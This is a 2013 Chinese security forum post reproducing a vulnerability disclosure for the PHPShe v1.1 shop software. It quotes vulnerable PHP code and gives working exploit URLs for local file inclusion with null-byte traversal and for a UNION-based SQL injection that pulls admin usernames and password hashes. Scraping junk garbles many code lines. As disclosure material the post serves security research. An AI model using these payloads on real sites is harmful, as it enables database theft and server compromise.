找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2075|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:45:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/  T+ a9 [% ~, Q! @3 H' m
/* Phpshe v1.1 Vulnerability1 `% b) B0 {0 i
/* ========================! a" ^  @5 d. m: W
/* By: : Kn1f3' }) F. ?- t# _) e7 H; n
/* E-Mail : 681796@qq.com
; [$ L+ Z0 g( P* v; Q) @/*******************************************************/" [, x. k. F' N7 R4 {; S
0×00 整体大概参数传输
( ^5 |8 T5 o0 ^" m7 _/ X) m, ?   O( t  d0 o1 C8 p
4 u2 X  F, f2 ~' |/ u1 J$ x. G

3 i5 V/ s+ `/ K, x3 m* L//common.php7 [0 X2 C; x, O0 _0 j1 c, b1 R
if (get_magic_quotes_gpc()) {& L9 W9 d6 i) N* J) i
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
  I+ ?3 L# L) j; K!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
8 K( e7 R( U3 q/ f}
5 U' f1 F! K4 felse {0 v' ?. P. [' l
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
% i7 {/ z, ^# g; k# ~9 \!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
. y) G6 x- b* y) l- Z/ u, U}! C# ^! t( L1 }7 f* W# b/ ~1 ^
session_start();+ @  \" Y$ ]& M' {( I0 P' k0 w( ~
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');9 w9 w! ?% A  {: {% j/ Q
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
" z3 c4 t( B  c# W, }' d5 P. [+ P" u8 n4 q& R6 z- s
0×01 包含漏洞# Q8 B$ f/ x4 {9 R4 e

: C6 M' V7 ]- I; O2 `- y& K5 A& v% O1 _9 K# F6 Z+ T2 O/ _6 l
//首页文件6 @. ~! ~& S9 t+ [
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);) N! j* \4 b0 Y
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
( o4 v/ U4 c) [$ x3 Zpe_result();
2 o8 a) w" s0 q  w( w7 t?>
* z  U, w) n; X9 E' K9 c1 F, c//common 文件 第15行开始
- P( O. @* I, R' p& W8 u2 [url路由配置
9 h- p) ~) V9 `  l# f) Y$module = $mod = $act = 'index';9 v" Z) i% K) |0 R3 C, E1 n0 W
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);$ C3 K( `" p! j( _9 G/ P. J$ N7 F
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);3 d1 f7 u7 ^( X5 L- X) c% Q
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);9 h$ F+ O) B( v0 \
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00& t6 J- f! s6 B9 O1 p5 Y# `

; [) O3 u) }! Y' S$ s1 ^) ~# _0 }
( m+ s# J0 r1 m1 o( n* m
0×02 搜索注入
/ a" f2 C. t/ ?# B) i% x
* b$ L+ Q7 c6 o6 f: r6 Y7 R- I<code id="code2">

//product.php文件8 y$ B  w" F  |; V
case 'list':- |- D1 W# l% d7 e* R
$category_id = intval($id);6 _; u9 B+ k- b8 d2 N
$info = $db->pe_select('category', array('category_id'=>$category_id));4 P8 `" e9 u: `' e2 J- }7 h7 g( D+ u  D
//搜索7 R, b, W6 Q" s
$sqlwhere = " and `product_state` = 1";
6 h8 y( B- }; b; O# ^# {# Qpe_lead('hook/category.hook.php');
) l5 W# r# {( U3 ?- {( wif ($category_id) {
8 Q5 \# l, U1 ^1 f3 O0 Qwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
" J% \5 B# c4 T5 s: b6 W}
' D5 h# C; S& N- ?* z4 }$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
  v  c) S8 G8 c/ }8 {, eif ($_g_orderby) {
( B2 ]/ N( Z& a* a, `$orderby = explode('_', $_g_orderby);9 P9 C) I- [, O$ U: G
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";* o. j5 X2 A  Z7 w- m
}
/ u" G! {8 Q' Jelse {
# l0 ~4 X" o2 y2 O$sqlwhere .= " order by `product_id` desc";
- p6 A* Y6 J1 W. r2 {}
+ i- ]/ A1 T1 F; Q% F$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
1 z: \3 G9 G) O9 @1 m//热卖排行/ ^# `( n& j- [% E% n' }( k( l
$product_hotlist = product_hotlist();& B  j8 s' m2 O  ]
//当前路径
( Z" E/ o; G( c! {3 Y$nowpath = category_path($category_id);9 `  _2 k: [8 ]7 `, H
$seo = pe_seo($info['category_name']);* s* G; c; h: `6 Y
include(pe_tpl('product_list.html'));3 o9 x3 W) d3 q5 a  J* V
//跟进selectall函数库
& b( q0 k7 N% ]* |( Q* dpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
) y( Q' |8 j) k0 e# Y  X{
1 @+ F- }1 N9 `  [- B//处理条件语句8 v6 G5 I- h, J7 g5 m7 m/ i% `  E
$sqlwhere = $this->_dowhere($where);1 R# u0 F$ l3 ?2 m
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);' T7 ]* N$ u- P# J2 @- z
}
9 m6 `0 V% V2 w5 ~//exp
- \& r9 g& ?) R6 A$ w/ ^( Kproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
; M& F$ f" z/ T$ |1 ~

</code>5 a1 j/ Q7 y. M/ b: _

3 P6 g3 x2 @$ i# N) O" h0×03 包含漏洞29 `6 S$ \8 m; j1 a: P
; P' ]2 p- d0 A+ k
<code id="code3">

//order.php

case 'pay':


7 y! E6 v8 y$ i# W$order_id = pe_dbhold($_g_id);

1 L) L" d/ x  a: G" H7 O1 }2 z, {
$cache_payway = cache::get('payway');


! \( Y! N. E; |3 m6 y, Tforeach($cache_payway as $k => $v) {


+ c; C% o0 o* B4 U9 C8 O9 [$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

9 j+ @' w/ s8 t( z
if ($k == 'bank') {


% ?; w9 c: k7 h. s1 n1 K* |+ q$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


+ X. w0 u3 u4 |2 `. w}

- E" Z; y# c2 k( ?# a
}

) Y7 d4 \) ~) P4 C+ X. H
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


, a  [; b  Z  \% O. a$ e  x0 S!$order['order_id'] && pe_error('订单号错误...');


, W& y6 N& y8 t) p2 d. m5 Tif (isset($_p_pesubmit)) {


: z' p- g2 G2 C4 t5 ?if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

/ `+ n- V7 {9 q& V2 V
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

, Z9 {$ f2 t$ `- H+ Y+ n3 W! n
foreach ($info_list as $v) {


0 B4 O) N+ N3 U( M1 \( q' r$order['order_name'] .= "{$v['product_name']};";
2 O* z4 u5 M, x. f: J

' s# e  @3 _5 ]) ^
}

: o1 c) ?; ]6 E3 l! f
echo '正在为您连接支付网站,请稍后...';


; K$ y) e+ E$ e6 o- Linclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


8 M* {9 K( x5 B, }" |}//当一切准备好的时候就可以进行"鸡肋包含了"


. @; Z; m& h$ {6 X0 i5 W* L% Jelse {

7 M5 n; C1 a2 M* O
pe_error('支付错误...');

$ q! q+ K) @9 r; }
}


+ W) W  R, [5 k1 J$ S}

0 J5 K6 t5 `* r  T5 Q7 E. k. r
$seo = pe_seo('选择支付方式');


2 q4 P+ @$ }; A7 zinclude(pe_tpl('order_pay.html'));


! j( w+ x( R" o5 X$ X1 Zbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>" F' f% M4 |7 W6 [3 M
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表